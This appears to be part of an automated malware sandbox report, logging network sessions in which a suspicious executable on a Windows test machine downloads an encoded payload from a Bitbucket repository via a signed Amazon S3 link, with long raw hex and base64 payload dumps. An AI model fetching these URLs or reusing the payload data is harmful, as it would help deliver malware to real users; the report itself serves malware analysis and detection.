                                                                                                                                        2024-10-23 05:02:11 UTC16384INData Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 52 47 41 34 57 47 79 55 65 46 78 55 58 46 53 55 53 4a 42 77 69 47 79 49 53 4a 69 4d 50 4a 79 63 52 46 52 4d 52 48 69 51 6a 47 68 55 57 49 51 38 5a 4a 52 51 52 49 78 45 65 47 68 77 6c 47 68 55 59 47 52 51 56 70 71 36 6c 57 53 4f 6e 73 55 74 58 49 53 41 64 4a 42 34 66 49 53 59 67 4a 4b 61 75 70 56 6b 6a 70 37 46 4c 61 46 39 6c 58 57 4a 73 64 56 35 63 58 6c 78 73 61 58 74 6a 65 57 4a 35 61 57 31 36 5a 6d 35 75 61 46 78 71 61 48 56 37 65 6d 46 63 58 58 68 6d 59 47 78 72 61 48 70 6f 64 57 46 6a 62 47 46 63 58 32 42 72 58 47 68 66 5a 56 31 69 62 48 56 65 58 46 35 63 62 47 6c 37 59 33 6c 69 65 57 6c 74 65 6d 5a 75 62 6d 68 63 61 6d 68 31 65 33 70 68 58 46 31 34 5a 6d 42 73 61 32 68 36 61 48 56 68 59 32 78 68 58 46 39 67 61 31 78
                                                                                                                                        Data Ascii: pq6lWSOnsUsRGA4WGyUeFxUXFSUSJBwiGyISJiMPJycRFRMRHiQjGhUWIQ8ZJRQRIxEeGhwlGhUYGRQVpq6lWSOnsUtXISAdJB4fISYgJKaupVkjp7FLaF9lXWJsdV5cXlxsaXtjeWJ5aW16Zm5uaFxqaHV7emFcXXhmYGxraHpodWFjbGFcX2BrXGhfZV1ibHVeXF5cbGl7Y3lieWltemZubmhcamh1e3phXF14ZmBsa2h6aHVhY2xhXF9ga1x
                                                                                                                                        2024-10-23 05:02:11 UTC460INData Raw: 65 6b 76 59 78 67 52 43 4a 53 78 50 65 63 2f 72 6d 54 36 76 5a 6b 6b 4c 2f 63 72 39 7a 68 6c 6d 5a 6a 59 75 56 41 66 77 6b 7a 42 78 34 58 5a 65 51 70 46 30 37 56 4a 38 31 57 57 54 4c 78 49 6a 4f 67 53 70 33 5a 44 67 50 35 57 44 73 35 74 66 56 78 79 42 67 47 42 35 57 52 30 47 35 67 69 68 4a 57 36 2b 75 76 32 58 46 61 74 31 73 47 71 68 54 32 4f 73 42 61 31 6f 51 56 69 6d 4b 2b 39 2f 63 66 67 4d 79 6c 4b 52 2f 4f 32 63 38 44 5a 67 54 49 70 43 65 75 4e 4e 39 50 71 72 70 4a 44 47 58 2b 58 62 76 6b 35 49 50 66 68 35 71 55 38 4f 6f 67 4b 44 4f 4f 6d 4a 34 51 72 36 72 67 6a 4f 65 48 70 4b 6b 46 6a 4f 4b 4a 53 2b 76 36 4e 4a 69 64 30 69 2f 67 62 4e 63 78 6d 53 42 72 75 58 55 6f 68 6f 45 5a 33 35 43 57 69 4d 46 65 65 67 47 72 36 76 36 6d 65 70 69 4f 39 71 62 67 4d
                                                                                                                                        Data Ascii: ekvYxgRCJSxPec/rmT6vZkkL/cr9zhlmZjYuVAfwkzBx4XZeQpF07VJ81WWTLxIjOgSp3ZDgP5WDs5tfVxyBgGB5WR0G5gihJW6+uv2XFat1sGqhT2OsBa1oQVimK+9/cfgMylKR/O2c8DZgTIpCeuNN9PqrpJDGX+Xbvk5IPfh5qU8OogKDOOmJ4Qr6rgjOeHpKkFjOKJS+v6NJid0i/gbNcxmSBruXUohoEZ35CWiMFeegGr6v6mepiO9qbgM
                                                                                                                                        2024-10-23 05:02:12 UTC7886INData Raw: 6b 76 56 76 54 79 56 6a 58 61 4b 51 6c 34 67 2f 39 55 36 6b 43 44 30 66 76 62 57 68 6a 47 61 46 77 68 49 69 31 47 4e 64 64 35 54 6b 59 72 69 4f 5a 72 44 42 71 70 78 33 41 2b 30 4d 35 68 74 65 7a 4b 74 79 39 4b 57 49 36 79 46 66 56 4d 66 4b 4c 72 35 35 4d 56 32 41 48 5a 62 6f 77 2f 41 63 62 2b 75 51 5a 73 41 6b 6e 53 6b 59 4e 77 51 2f 47 39 4a 4a 61 77 4e 54 46 34 66 50 67 2b 6a 63 76 49 49 61 4c 30 4d 4c 30 66 6b 34 6e 61 72 35 44 33 48 62 56 36 6d 2b 66 45 79 6e 68 78 69 2f 68 78 6e 42 42 2b 4e 32 2f 6e 70 54 4f 7a 41 57 61 67 70 2b 32 67 78 4a 66 64 32 43 68 34 55 41 62 32 32 75 77 54 57 55 50 37 43 56 39 71 4a 42 4d 77 2b 33 52 4b 46 34 4d 75 37 73 79 5a 50 43 78 68 44 34 2b 48 58 54 46 71 38 31 78 78 6f 66 70 31 55 68 54 51 37 59 6a 70 67 79 44 34 4c
                                                                                                                                        Data Ascii: kvVvTyVjXaKQl4g/9U6kCD0fvbWhjGaFwhIi1GNdd5TkYriOZrDBqpx3A+0M5htezKty9KWI6yFfVMfKLr55MV2AHZbow/Acb+uQZsAknSkYNwQ/G9JJawNTF4fPg+jcvIIaL0ML0fk4nar5D3HbV6m+fEynhxi/hxnBB+N2/npTOzAWagp+2gxJfd2Ch4UAb22uwTWUP7CV9qJBMw+3RKF4Mu7syZPCxhD4+HXTFq81xxofp1UhTQ7YjpgyD4L
                                                                                                                                        2024-10-23 05:02:12 UTC16384INData Raw: 72 47 63 6e 64 54 48 2f 51 39 68 52 59 72 6d 68 36 4f 30 34 4d 44 64 6f 4c 48 44 71 4d 78 35 76 4f 6f 55 44 6b 73 79 51 67 69 4a 56 4b 55 64 2b 58 71 2f 52 70 41 6e 54 5a 33 36 49 4f 34 43 77 65 6f 48 53 2b 72 67 5a 6c 66 35 52 33 39 4e 34 42 4e 6b 4b 54 69 4a 33 4b 78 34 7a 2b 66 37 37 65 51 6a 53 6c 31 38 4d 77 71 74 53 31 4d 62 61 4f 4a 6e 78 58 6c 5a 6c 56 79 5a 4e 6e 39 6d 49 4f 37 62 4b 6a 38 35 56 4e 47 62 65 51 37 4f 5a 33 50 4a 62 39 45 56 6e 65 41 73 47 46 50 63 69 63 5a 42 6d 66 70 72 63 7a 75 79 68 4b 30 51 56 77 67 31 78 63 48 33 53 33 74 6c 4a 6c 43 33 44 7a 79 34 54 31 6c 34 70 69 58 45 72 5a 59 7a 4e 2f 42 39 2b 51 30 57 75 76 42 7a 51 48 31 32 77 7a 79 4c 35 4e 71 46 47 6b 33 49 51 37 78 61 6e 78 4f 33 55 78 68 6d 76 53 4c 4f 48 6e 66 79
                                                                                                                                        Data Ascii: rGcndTH/Q9hRYrmh6O04MDdoLHDqMx5vOoUDksyQgiJVKUd+Xq/RpAnTZ36IO4CweoHS+rgZlf5R39N4BNkKTiJ3Kx4z+f77eQjSl18MwqtS1MbaOJnxXlZlVyZNn9mIO7bKj85VNGbeQ7OZ3PJb9EVneAsGFPcicZBmfprczuyhK0QVwg1xcH3S3tlJlC3Dzy4T1l4piXErZYzN/B9+Q0WuvBzQH12wzyL5NqFGk3IQ7xanxO3UxhmvSLOHnfy
                                                                                                                                        2024-10-23 05:02:12 UTC1024INData Raw: 73 68 66 62 6a 49 4e 78 30 48 62 62 4a 7a 4c 59 6d 2b 32 37 54 79 2b 73 56 4b 4a 76 41 44 57 36 76 6f 70 72 44 4a 79 7a 41 38 58 4a 4b 71 67 6e 55 69 73 52 6a 2f 79 76 58 65 6f 4d 4a 63 77 68 2f 65 35 48 61 2f 42 72 7a 47 6f 69 43 52 32 74 2b 61 74 78 56 52 31 59 32 65 6c 50 51 74 70 41 4c 56 53 75 32 63 37 31 6b 4b 6c 66 49 6c 48 47 72 71 67 63 4a 67 39 37 4b 4f 41 72 4e 74 77 32 48 61 65 4f 43 31 67 42 65 45 4b 52 46 6c 37 71 68 52 43 52 30 79 58 38 68 77 77 6c 56 6e 64 61 46 73 70 79 7a 75 61 43 69 50 59 56 65 45 2f 72 53 5a 64 42 30 41 4a 46 33 48 76 54 4d 2b 44 77 42 6c 4d 57 49 48 35 50 59 6b 36 79 41 74 37 73 65 52 51 56 2f 63 46 79 30 78 30 45 50 6a 61 49 2b 67 72 64 6c 70 7a 77 6a 33 79 67 54 4a 67 7a 2b 36 76 33 43 31 71 50 50 39 46 6d 53 56 43
                                                                                                                                        Data Ascii: shfbjINx0HbbJzLYm+27Ty+sVKJvADW6voprDJyzA8XJKqgnUisRj/yvXeoMJcwh/e5Ha/BrzGoiCR2t+atxVR1Y2elPQtpALVSu2c71kKlfIlHGrqgcJg97KOArNtw2HaeOC1gBeEKRFl7qhRCR0yX8hwwlVndaFspyzuaCiPYVeE/rSZdB0AJF3HvTM+DwBlMWIH5PYk6yAt7seRQV/cFy0x0EPjaI+grdlpzwj3ygTJgz+6v3C1qPP9FmSVC
                                                                                                                                        2024-10-23 05:02:12 UTC11208INData Raw: 53 46 72 48 49 79 41 76 6f 57 65 70 44 2f 79 37 42 72 74 37 4d 4d 64 43 76 79 4c 50 69 6b 50 31 57 59 42 6a 35 59 53 59 64 79 68 69 4c 39 65 32 31 69 37 6b 53 37 70 76 34 4e 36 50 57 52 6f 74 56 2f 65 6e 52 48 50 50 54 35 38 49 46 31 69 5a 62 44 74 48 35 73 68 79 57 79 74 4b 35 64 4e 68 38 57 31 42 69 57 53 71 71 47 6c 52 37 45 4e 59 6e 4b 58 52 58 55 43 76 73 4f 46 55 4e 35 63 5a 7a 45 75 74 61 47 48 6c 74 50 47 52 38 34 65 62 34 6f 70 70 5a 6f 50 76 53 6c 73 62 58 31 4f 2f 4d 46 62 37 2b 2f 56 2b 6f 76 48 47 30 38 6f 4c 41 72 5a 70 4c 56 4a 43 79 37 44 50 41 71 70 4c 4c 61 6c 5a 36 49 59 4b 53 2b 64 64 4d 71 4d 75 30 6d 2b 73 43 4f 53 45 49 57 68 78 61 4a 4c 50 6b 56 2b 79 78 65 61 42 63 74 79 31 43 66 2b 34 6c 31 56 67 53 4a 4c 72 70 75 75 46 6b 64 46
                                                                                                                                        Data Ascii: SFrHIyAvoWepD/y7Brt7MMdCvyLPikP1WYBj5YSYdyhiL9e21i7kS7pv4N6PWRotV/enRHPPT58IF1iZbDtH5shyWytK5dNh8W1BiWSqqGlR7ENYnKXRXUCvsOFUN5cZzEutaGHltPGR84eb4oppZoPvSlsbX1O/MFb7+/V+ovHG08oLArZpLVJCy7DPAqpLLalZ6IYKS+ddMqMu0m+sCOSEIWhxaJLPkV+yxeaBcty1Cf+4l1VgSJLrpuuFkdF
                                                                                                                                        2024-10-23 05:02:12 UTC16384INData Raw: 30 2b 6f 4b 35 6a 53 33 7a 78 4e 50 61 50 30 32 76 74 6e 69 36 50 48 58 32 56 55 61 6a 73 4e 69 63 69 59 66 6d 68 54 33 6f 4f 63 2b 4e 51 6c 64 7a 50 4d 73 47 5a 56 38 78 68 74 31 56 75 6c 5a 4b 46 72 39 36 77 41 64 69 4a 38 48 62 45 38 64 4b 4e 78 6e 52 38 77 62 43 46 44 35 6b 31 54 49 43 73 35 38 67 48 74 47 4e 48 68 47 53 72 6b 59 50 73 4b 52 79 46 42 78 58 4b 34 4d 39 75 5a 2f 4d 73 6a 54 46 6b 30 45 42 6e 45 67 64 53 61 69 66 74 49 6f 4b 42 65 74 64 43 38 38 45 61 70 6c 66 65 34 57 4a 55 42 78 32 41 50 39 35 66 63 55 6b 79 2f 6c 43 56 6f 6c 36 35 55 33 63 43 74 70 2f 47 6d 4b 4d 49 74 77 33 34 37 68 4d 42 48 43 52 70 31 53 57 77 58 68 35 76 76 63 79 37 70 36 76 74 4d 37 79 65 42 2f 6f 65 39 71 37 42 47 37 37 31 5a 65 62 52 46 6f 4b 62 42 56 46 65 4a
                                                                                                                                        Data Ascii: 0+oK5jS3zxNPaP02vtni6PHX2VUajsNiciYfmhT3oOc+NQldzPMsGZV8xht1VulZKFr96wAdiJ8HbE8dKNxnR8wbCFD5k1TICs58gHtGNHhGSrkYPsKRyFBxXK4M9uZ/MsjTFk0EBnEgdSaiftIoKBetdC88Eaplfe4WJUBx2AP95fcUky/lCVol65U3cCtp/GmKMItw347hMBHCRp1SWwXh5vvcy7p6vtM7yeB/oe9q7BG771ZebRFoKbBVFeJ
                                                                                                                                        2024-10-23 05:02:12 UTC1024INData Raw: 4a 4f 41 4f 50 2f 4c 36 43 58 77 50 34 34 54 64 77 79 6c 4b 70 2b 4a 49 55 37 51 46 57 43 70 6c 4b 49 66 52 57 46 65 4f 2b 73 2f 4a 73 33 64 35 61 6d 63 37 4e 2f 65 45 72 6e 32 45 4d 77 54 2f 6f 6f 6a 39 67 6f 4c 61 75 55 74 64 49 69 70 6b 42 54 58 53 6b 57 61 39 50 56 67 4d 2f 74 49 32 41 30 34 54 36 71 32 53 4b 6c 61 48 6b 5a 55 58 43 70 35 44 48 57 41 44 2b 33 69 64 57 47 61 2b 4d 37 58 6f 6c 63 52 34 54 73 38 71 34 38 6c 30 71 44 5a 52 49 4e 38 78 4b 34 4f 4a 51 6b 68 34 4b 67 2f 6b 74 48 55 4b 77 34 79 44 6b 44 6d 46 6a 71 59 52 56 2b 7a 47 4a 43 4e 2b 66 6d 6f 42 44 4c 34 33 35 6e 37 4b 39 44 62 6b 30 68 66 4f 64 30 6d 43 2b 68 53 49 33 4a 32 4e 51 51 4a 4b 34 30 68 51 35 76 55 33 36 76 69 63 4d 59 4e 2f 55 74 4e 30 72 36 64 54 64 37 57 62 56 46 45
                                                                                                                                        Data Ascii: JOAOP/L6CXwP44TdwylKp+JIU7QFWCplKIfRWFeO+s/Js3d5amc7N/eErn2EMwT/ooj9goLauUtdIipkBTXSkWa9PVgM/tI2A04T6q2SKlaHkZUXCp5DHWAD+3idWGa+M7XolcR4Ts8q48l0qDZRIN8xK4OJQkh4Kg/ktHUKw4yDkDmFjqYRV+zGJCN+fmoBDL435n7K9Dbk0hfOd0mC+hSI3J2NQQJK40hQ5vU36vicMYN/UtN0r6dTd7WbVFE
                                                                                                                                        2024-10-23 05:02:12 UTC9592INData Raw: 46 61 59 39 5a 70 61 35 72 48 49 36 44 4b 44 53 50 70 4f 70 66 68 32 67 38 4d 6f 44 64 38 64 56 55 35 6a 59 4f 65 77 4b 35 68 64 4a 62 31 31 64 74 75 37 62 75 38 4f 74 62 52 6e 57 46 64 49 55 30 36 55 78 77 64 62 4b 73 46 62 79 48 42 66 57 6c 39 59 36 71 7a 37 37 55 4f 57 67 61 76 55 78 73 65 33 47 39 47 38 6b 79 50 4a 78 35 46 74 70 74 4c 31 55 6e 70 30 35 73 68 53 6b 59 69 48 30 31 6a 49 77 69 45 4c 62 38 62 50 33 37 47 55 44 62 6d 63 34 6f 71 4f 44 55 2f 47 58 71 67 77 51 47 33 4e 35 48 61 76 31 55 76 55 62 42 57 5a 68 61 4c 4c 37 66 38 70 54 57 52 61 67 61 79 2f 75 59 65 75 71 4c 51 61 68 7a 4a 5a 46 51 62 6d 43 63 49 67 43 78 35 74 46 34 4f 42 65 6c 50 67 70 62 32 51 73 62 56 6b 4c 47 6c 4c 48 79 44 64 56 4b 56 67 45 44 36 68 44 5a 39 71 63 47 51 50
                                                                                                                                        Data Ascii: FaY9Zpa5rHI6DKDSPpOpfh2g8MoDd8dVU5jYOewK5hdJb11dtu7bu8OtbRnWFdIU06UxwdbKsFbyHBfWl9Y6qz77UOWgavUxse3G9G8kyPJx5FtptL1Unp05shSkYiH01jIwiELb8bP37GUDbmc4oqODU/GXqgwQG3N5Hav1UvUbBWZhaLL7f8pTWRagay/uYeuqLQahzJZFQbmCcIgCx5tF4OBelPgpb2QsbVkLGlLHyDdVKVgED6hDZ9qcGQP
                                                                                                                                        2024-10-23 05:02:12 UTC16384INData Raw: 4f 4a 31 56 73 54 77 49 5a 66 44 77 45 39 74 74 38 73 69 4f 70 54 41 69 75 57 6f 66 76 69 45 79 6a 48 68 6f 4b 46 33 66 48 53 54 51 48 52 4e 77 4d 6d 51 31 57 63 6e 66 6f 46 78 70 42 73 2f 4e 67 43 33 59 63 65 35 4c 2b 53 77 61 45 6c 79 5a 56 46 73 64 55 4e 4f 6e 54 4a 6d 41 2f 73 2b 79 47 4d 37 47 48 51 37 45 31 37 55 41 48 66 35 7a 59 57 6f 66 4b 31 52 45 4b 30 69 61 2f 36 59 4a 52 4b 45 76 37 57 38 43 54 64 41 61 5a 6f 79 79 7a 31 65 45 4a 67 51 57 75 4e 6c 77 49 72 4c 78 36 2f 53 59 57 62 53 6e 68 73 4e 78 47 56 4b 7a 49 49 79 6b 56 33 4d 36 74 36 74 6f 51 73 39 55 68 67 6c 48 4e 58 68 62 75 66 6c 44 6c 56 39 46 36 72 42 4f 56 79 46 36 55 34 6e 43 69 65 35 76 45 2b 6c 49 63 4e 76 42 79 71 52 72 56 2b 37 50 36 30 76 69 71 68 61 71 58 6b 39 6d 55 56 64
                                                                                                                                        Data Ascii: OJ1VsTwIZfDwE9tt8siOpTAiuWofviEyjHhoKF3fHSTQHRNwMmQ1WcnfoFxpBs/NgC3Yce5L+SwaElyZVFsdUNOnTJmA/s+yGM7GHQ7E17UAHf5zYWofK1REK0ia/6YJRKEv7W8CTdAaZoyyz1eEJgQWuNlwIrLx6/SYWbSnhsNxGVKzIIykV3M6t6toQs9UhglHNXhbuflDlV9F6rBOVyF6U4nCie5vE+lIcNvByqRrV+7P60viqhaqXk9mUVd


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        2192.168.2.749703185.166.143.484436452C:\Users\user\Desktop\z10982283782.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-10-23 05:02:13 UTC187OUTGET /akeem4u/canter/downloads/233_Ltspwqrtysw HTTP/1.1
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Accept: */*
                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                        Host: bitbucket.org
                                                                                                                                        2024-10-23 05:02:13 UTC5172INHTTP/1.1 302 Found
                                                                                                                                        Date: Wed, 23 Oct 2024 05:02:13 GMT
                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                        Content-Length: 0
                                                                                                                                        Server: AtlassianEdge
                                                                                                                                        Location: https://bbuseruploads.s3.amazonaws.com/1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/a122b37b-2be1-4956-a228-3e44b96626b8/233_Ltspwqrtysw?response-content-disposition=attachment%3B%20filename%3D%22233_Ltspwqrtysw%22&AWSAccessKeyId=ASIA6KOSE3BNA3TNBD6S&Signature=bquajkbDUnHiY6Qk9cEyy3Ji0xM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEE0aCXVzLWVhc3QtMSJIMEYCIQDWLdnMpGGZVnfuf5mZ7tkLhGS%2BHN%2Fi5hrbwc5K5HeekAIhALFcc1ROzTR8B4kcaA2oVW3sq0zTC7bxDYRYDuyXyj6sKrACCLb%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgyNe%2FRStUblqwXyTbkqhAK8BQ1NlXfF77BQxUe%2BLDGJ72hzvISSyyG1nPahXGTPb9H%2F4F2%2F5GlsBuXRyGcOQkj4ERRXbeHiahdKc%2BywbR6YEWoYOH14NAUuJivTj9fBN6WDk7UmQ8nnk5IxunnOohsVHIhsiRtMzjGYE3m%2BT3Nv%2B2LBuAC5kTgwrpgGcGd3z79%2FubqvQWKpCPk5OQo1tvOyZDdGiaMdoJrU%2F%2B%2F6PyCU39h28LMR4%2BdAAh6%2FYzNlkOlxzs7Ih0fOSFaTs1BSOSRuTvP9GixHrOn3THgqHyMm8F1oMbov2tlWw%2BCDNj5ns8S8xb%2BGRMfWJz69PjosPmJKRQvcpZYEVJ%2Fuao%2BBg6rxNrk1bzCkhuK4BjqcAeGCMiJnZekyMuhm2XJ%2FmPZHGuv1mMGkMdY36AKfCoyDFZlLRnUelBbsByQxcf9NuZCZIj5sRzg6N9aafMqZIWX [TRUNCATED]
                                                                                                                                        Expires: Wed, 23 Oct 2024 05:02:13 GMT
                                                                                                                                        Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                                        X-Used-Mesh: False
                                                                                                                                        Vary: Accept-Language, Origin
                                                                                                                                        Content-Language: en
                                                                                                                                        X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                        X-Dc-Location: Micros-3
                                                                                                                                        X-Served-By: 4f033736e791
                                                                                                                                        X-Version: 4bc3453affe5
                                                                                                                                        X-Static-Version: 4bc3453affe5
                                                                                                                                        X-Request-Count: 2297
                                                                                                                                        X-Render-Time: 0.06429934501647949
                                                                                                                                        X-B3-Traceid: 0700a870dcdf49dbac744012fc0f9af5
                                                                                                                                        X-B3-Spanid: 019f1a6cf5ad8a60
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        Content-Security-Policy: object-src 'none'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; base-uri 'self'; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.c [TRUNCATED]
                                                                                                                                        X-Usage-Quota-Remaining: 998793.849
                                                                                                                                        X-Usage-Request-Cost: 1061.50
                                                                                                                                        X-Usage-User-Time: 0.028822
                                                                                                                                        X-Usage-System-Time: 0.003023
                                                                                                                                        X-Usage-Input-Ops: 0
                                                                                                                                        X-Usage-Output-Ops: 0
                                                                                                                                        Age: 0
                                                                                                                                        X-Cache: MISS
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                                        Atl-Traceid: 0700a870dcdf49dbac744012fc0f9af5
                                                                                                                                        Atl-Request-Id: 0700a870-dcdf-49db-ac74-4012fc0f9af5
                                                                                                                                        Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                                        Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                                        Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                        Server-Timing: atl-edge;dur=172,atl-edge-internal;dur=3,atl-edge-upstream;dur=171,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                                                        Connection: close


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        3192.168.2.7497043.5.3.654436452C:\Users\user\Desktop\z10982283782.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-10-23 05:02:14 UTC1295OUTGET /1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/a122b37b-2be1-4956-a228-3e44b96626b8/233_Ltspwqrtysw?response-content-disposition=attachment%3B%20filename%3D%22233_Ltspwqrtysw%22&AWSAccessKeyId=ASIA6KOSE3BNA3TNBD6S&Signature=bquajkbDUnHiY6Qk9cEyy3Ji0xM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEE0aCXVzLWVhc3QtMSJIMEYCIQDWLdnMpGGZVnfuf5mZ7tkLhGS%2BHN%2Fi5hrbwc5K5HeekAIhALFcc1ROzTR8B4kcaA2oVW3sq0zTC7bxDYRYDuyXyj6sKrACCLb%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgyNe%2FRStUblqwXyTbkqhAK8BQ1NlXfF77BQxUe%2BLDGJ72hzvISSyyG1nPahXGTPb9H%2F4F2%2F5GlsBuXRyGcOQkj4ERRXbeHiahdKc%2BywbR6YEWoYOH14NAUuJivTj9fBN6WDk7UmQ8nnk5IxunnOohsVHIhsiRtMzjGYE3m%2BT3Nv%2B2LBuAC5kTgwrpgGcGd3z79%2FubqvQWKpCPk5OQo1tvOyZDdGiaMdoJrU%2F%2B%2F6PyCU39h28LMR4%2BdAAh6%2FYzNlkOlxzs7Ih0fOSFaTs1BSOSRuTvP9GixHrOn3THgqHyMm8F1oMbov2tlWw%2BCDNj5ns8S8xb%2BGRMfWJz69PjosPmJKRQvcpZYEVJ%2Fuao%2BBg6rxNrk1bzCkhuK4BjqcAeGCMiJnZekyMuhm2XJ%2FmPZHGuv1mMGkMdY36AKfCoyDFZlLRnUelBbsByQxcf9NuZCZIj5sRzg6N9aafMqZIWX0TejNIhed6dqnVS8HwylTQKvAyrfpMWEXQYcoRuCgC5H [TRUNCATED]
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Accept: */*
                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                        Host: bbuseruploads.s3.amazonaws.com
                                                                                                                                        2024-10-23 05:02:14 UTC564INHTTP/1.1 200 OK
                                                                                                                                        x-amz-id-2: 86MRn3m5Urr/RDXKUByU2cfXY2nnTidpB7JTF3JMf0hHoa++wXSZbCraTac+jhgSvs/Ln+WKKpVYQ024mKMJj6px95wtm+7j
                                                                                                                                        x-amz-request-id: 6P0F7V9G37K7A9B1
                                                                                                                                        Date: Wed, 23 Oct 2024 05:02:15 GMT
                                                                                                                                        Last-Modified: Tue, 22 Oct 2024 05:16:04 GMT
                                                                                                                                        ETag: "5d7ab335987101c49bbbe6ebcea19843"
                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                        x-amz-version-id: aV2sZzfG3ESjVStuXavykQrQq1UCdUQQ
                                                                                                                                        Content-Disposition: attachment; filename="233_Ltspwqrtysw"
                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        Server: AmazonS3
                                                                                                                                        Content-Length: 383200
                                                                                                                                        Connection: close
                                                                                                                                        2024-10-23 05:02:14 UTC1393INData Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 52 47 41 34 57 47 79 55 65 46 78 55 58 46 53 55 53 4a 42 77 69 47 79 49 53 4a 69 4d 50 4a 79 63 52 46 52 4d 52 48 69 51 6a 47 68 55 57 49 51 38 5a 4a 52 51 52 49 78 45 65 47 68 77 6c 47 68 55 59 47 52 51 56 70 71 36 6c 57 53 4f 6e 73 55 74 58 49 53 41 64 4a 42 34 66 49 53 59 67 4a 4b 61 75 70 56 6b 6a 70 37 46 4c 61 46 39 6c 58 57 4a 73 64 56 35 63 58 6c 78 73 61 58 74 6a 65 57 4a 35 61 57 31 36 5a 6d 35 75 61 46 78 71 61 48 56 37 65 6d 46 63 58 58 68 6d 59 47 78 72 61 48 70 6f 64 57 46 6a 62 47 46 63 58 32 42 72 58 47 68 66 5a 56 31 69 62 48 56 65 58 46 35 63 62 47 6c 37 59 33 6c 69 65 57 6c 74 65 6d 5a 75 62 6d 68 63 61 6d 68 31 65 33 70 68 58 46 31 34 5a 6d 42 73 61 32 68 36 61 48 56 68 59 32 78 68 58 46 39 67 61 31 78
                                                                                                                                        Data Ascii: pq6lWSOnsUsRGA4WGyUeFxUXFSUSJBwiGyISJiMPJycRFRMRHiQjGhUWIQ8ZJRQRIxEeGhwlGhUYGRQVpq6lWSOnsUtXISAdJB4fISYgJKaupVkjp7FLaF9lXWJsdV5cXlxsaXtjeWJ5aW16Zm5uaFxqaHV7emFcXXhmYGxraHpodWFjbGFcX2BrXGhfZV1ibHVeXF5cbGl7Y3lieWltemZubmhcamh1e3phXF14ZmBsa2h6aHVhY2xhXF9ga1x
                                                                                                                                        2024-10-23 05:02:14 UTC16384INData Raw: 77 31 30 30 46 6d 6a 46 47 43 30 30 57 63 5a 79 71 6c 36 56 56 75 62 42 41 56 4a 30 68 74 70 64 7a 50 32 75 67 4d 65 51 71 69 71 44 74 41 57 78 52 73 65 57 41 4b 39 42 6e 66 50 4e 2f 63 67 53 41 64 6d 32 35 6d 51 37 70 35 37 59 2f 43 44 6b 4e 2b 4b 58 36 41 53 76 45 68 35 72 67 72 6b 62 79 67 6d 48 5a 34 63 45 53 68 37 47 66 62 76 35 31 63 48 38 41 70 62 39 5a 68 47 71 66 71 38 73 70 61 46 4c 6a 71 59 72 5a 55 50 41 74 66 74 4e 44 74 49 75 67 65 6a 30 79 73 77 38 6e 75 51 6d 59 43 6a 61 6b 6c 51 59 55 42 6c 59 6c 68 32 32 5a 68 36 70 77 4f 6d 56 32 4c 68 69 4d 38 35 7a 72 6a 4a 31 53 58 62 6a 67 56 48 4f 31 4a 36 51 4b 4f 55 4e 2f 54 7a 6e 79 73 4d 4c 61 6a 45 72 37 71 47 41 39 56 71 7a 46 75 58 76 7a 2b 50 63 67 78 63 4e 65 58 53 65 59 4f 53 72 63 78 77
                                                                                                                                        Data Ascii: w100FmjFGC00WcZyql6VVubBAVJ0htpdzP2ugMeQqiqDtAWxRseWAK9BnfPN/cgSAdm25mQ7p57Y/CDkN+KX6ASvEh5rgrkbygmHZ4cESh7Gfbv51cH8Apb9ZhGqfq8spaFLjqYrZUPAtftNDtIugej0ysw8nuQmYCjaklQYUBlYlh22Zh6pwOmV2LhiM85zrjJ1SXbjgVHO1J6QKOUN/TznysMLajEr7qGA9VqzFuXvz+PcgxcNeXSeYOSrcxw
